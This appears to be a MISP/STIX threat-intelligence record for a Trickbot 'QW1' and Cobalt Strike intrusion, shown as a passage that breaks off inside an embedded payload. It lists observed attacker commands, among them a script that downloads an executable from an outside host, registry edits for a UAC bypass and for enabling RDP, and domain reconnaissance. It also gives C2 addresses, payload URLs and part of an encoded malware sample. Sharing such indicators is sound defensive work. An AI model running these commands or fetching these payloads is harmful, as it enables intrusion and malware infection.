misp-circl-feed/feeds/circl/stix-2.1/5e6793ed-2868-4474-a485-42210a0a020f.json

628 lines
965 KiB
JSON
Raw Permalink Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5e6793ed-2868-4474-a485-42210a0a020f",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:31.000Z",
"modified": "2021-05-24T10:05:31.000Z",
"name": "laskowski-tech.com",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5e6793ed-2868-4474-a485-42210a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2021-05-24T10:05:31.000Z",
"modified": "2021-05-24T10:05:31.000Z",
"name": "Trickbot Gtag QW1",
"published": "2020-07-03T03:59:04Z",
"object_refs": [
"x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f",
"x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f",
"x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f",
"x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f",
"x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f",
"x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f",
"x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f",
"x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f",
"x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f",
"x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f",
"x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f",
"x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f",
"x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f",
"x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f",
"x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f",
"x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f",
"x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f",
"indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a",
"indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f",
"indicator--5e679e17-e970-4164-bfb5-48b00a0a020f",
"indicator--5e679e17-4efc-46ea-9030-4d270a0a020f",
"indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"indicator--5e67a350-52bc-4280-95d9-4c180a0a020f",
"indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"indicator--5e67a3aa-e8c0-4340-8080-475b0a0a020f"
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
" Cobalt Strike Beacon",
"trickbot",
"Cobalt Strike",
"misp-galaxy:malpedia=\"TrickBot\""
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-66ec-41ba-8e88-41160a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /c C:\\DiskDrive\\1\\Volume\\errorfix.bat"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-5304-4794-a7f1-40e60a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cscript //nologo C:\\DiskDrive\\1\\Volume\\BackFiles\\pinumber[.]vbs hxxp://customscripts.us/QW1.exe C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-0d04-4a3b-b127-4f900a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "powershell -C Sleep -s 4;Saps 'C:\\DiskDrive\\1\\Volume\\BackFiles\\Jofert.exe'"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-0890-41b4-8ad5-44c40a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd[.]exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962c-11bc-4765-8d63-426c0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:16.000Z",
"modified": "2020-03-10T13:29:16.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-056c-4010-89f9-44730a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /t REG_SZ /d \"%WINDIR%\\system32\\cmd.exe /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-6efc-4391-a42e-43560a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add HKEY_CURRENT_USER\\Software\\Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\shell\\open\\command /v \"DelegateExecute\" /t REG_SZ /d \"\" /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-b170-4f39-b589-404f0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "\"%WINDIR%\\system32\\cmd[.]exe\" /c start %ALLUSERSPROFILE%\\\u00ec\u02dc\u0081\u00ec\u0192\u0081\u00d8\u00ab\u00d8\u00a7\u00d9\u0081\u00d9\u02c6\u00d8\u00b2\u00d8\u00a8\u00d8\u00aa.exe"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-4778-40ea-bbb0-4d550a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net config workstation"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-8e84-4b7c-82a2-48340a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe /c ipconfig /all"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-1a8c-4983-9d89-40c30a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net view /all"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-1a00-4fe1-b68c-4d190a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe \t/c net view /all /domain"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-d638-4805-b97a-46810a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "cmd.exe /c nltest /domain_trusts /all_trusts"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-50d0-4ff7-8730-45a10a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "\"%WINDIR%\\system32\\reg.exe\" add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-be20-40c3-a0fc-4c250a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd[.]exe /C reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-9430-4d3c-9e36-4f300a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "reg add \"\\\\usha-bdc\\HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-5e14-472f-a5ae-4c580a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e67962d-e270-4656-ad55-4dc10a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T13:29:17.000Z",
"modified": "2020-03-10T13:29:17.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679919-46a8-43dd-b8a5-4ec174656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:10.000Z",
"modified": "2020-03-10T14:04:10.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '95.179.210.8']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:04:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679919-10c8-46d0-b1bb-4d4d74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:25.000Z",
"modified": "2020-03-10T14:04:25.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '50.87.170.67']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:04:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e6799c2-a134-491d-9d9e-4d4b0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:10.000Z",
"modified": "2020-03-10T14:04:10.000Z",
"pattern": "[url:value = 'https://serviceuphelper.com:80/avxbDFb']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679a4c-e90c-4176-ac29-44f30a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:03:53.000Z",
"modified": "2020-03-10T14:03:53.000Z",
"pattern": "[url:value = 'http://customscripts.us/QW1.exe']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679e17-e970-4164-bfb5-48b00a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:03:53.000Z",
"modified": "2020-03-10T14:03:53.000Z",
"pattern": "[domain-name:value = 'customscripts.us']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e679e17-4efc-46ea-9030-4d270a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:04:09.000Z",
"modified": "2020-03-10T14:04:09.000Z",
"pattern": "[domain-name:value = 'serviceuphelper.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"domain\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Cobalt Strike"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a5f9-ec68-41ea-adeb-40950a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:37:02.000Z",
"modified": "2020-03-10T14:37:02.000Z",
"pattern": "[url:value = 'http://64.44.133.131/images/cursor.png']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-09T00:00:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"trickbot"
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T11:11:14.000Z",
"modified": "2020-03-17T11:11:14.000Z",
"first_observed": "2020-03-17T11:11:14Z",
"last_observed": "2020-03-17T11:11:14Z",
"number_observed": 1,
"object_refs": [
"url--5e70b052-319c-47bf-a3a8-461c0a0a020f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5e70b052-319c-47bf-a3a8-461c0a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a350-52bc-4280-95d9-4c180a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:25:20.000Z",
"modified": "2020-03-10T14:25:20.000Z",
"pattern": "[file:hashes.MD5 = 'b17e4833c580bbd343a1834be0e2a65f' AND file:hashes.SHA1 = '7ad2d4c4fe0efd021992391fcdb7e630a19f23f6' AND file:hashes.SHA256 = '5770d351522695562143fbf5d6381cb7c13151e3d3e1cdc923759bc60e025bbe' AND file:name = 'Jofert.exe' AND file:size = '385024' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-10T14:25:20Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e67a35f-bc6c-4a73-901f-4d400a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-10T14:25:35.000Z",
"modified": "2020-03-10T14:25:35.000Z",
